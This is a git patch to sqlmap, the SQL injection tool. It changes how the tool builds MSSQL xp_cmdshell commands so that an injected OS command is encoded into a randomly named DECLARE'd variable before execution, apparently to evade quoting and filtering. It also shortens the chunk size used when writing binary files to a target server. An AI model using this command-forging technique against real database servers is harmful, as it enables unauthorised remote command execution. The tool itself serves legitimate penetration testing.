From c7c84c3089e29564d24670542c662f2ae8756757 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Tue, 2 Nov 2010 15:31:51 +0000
Subject: [PATCH] Closes #111 (DECLARE/CHAR encode xp_cmdshell parameter in
 MSSQL).

---
 lib/takeover/xp_cmdshell.py   | 9 +++++++--
 plugins/generic/filesystem.py | 2 +-
 2 files changed, 8 insertions(+), 3 deletions(-)

diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
index 0df5e23e5..8d716b750 100644
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -13,6 +13,7 @@ from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.exception import sqlmapUnsupportedFeatureException
+from lib.core.unescaper import unescaper
 from lib.request import inject
 from lib.techniques.blind.timebased import timeUse
 
@@ -96,9 +97,13 @@ class xp_cmdshell:
             return False
 
     def xpCmdshellForgeCmd(self, cmd):
-        forgedCmd = "EXEC %s '%s'" % (self.xpCmdshellStr, cmd)
+        self.__randStr = randomStr(lowercase=True)
+        self.__cmd = unescaper.unescape("'%s'" % cmd)
+        self.__forgedCmd = "DECLARE @%s VARCHAR(8000); " % self.__randStr
+        self.__forgedCmd += "SET @%s = %s; " % (self.__randStr, self.__cmd)
+        self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)
 
-        return forgedCmd
+        return self.__forgedCmd
 
     def xpCmdshellExecCmd(self, cmd, silent=False):
         cmd = self.xpCmdshellForgeCmd(cmd)
diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py
index c71a5b72a..bacab0ce0 100644
--- a/plugins/generic/filesystem.py
+++ b/plugins/generic/filesystem.py
@@ -192,7 +192,7 @@ class Filesystem:
         forgedScrLines = []
         cmd            = ""
         charCounter    = 0
-        maxLen         = 4096
+        maxLen         = 512
 
         logger.debug("generating binary file %s\%s, wait.." % (tmpPath, chunkName))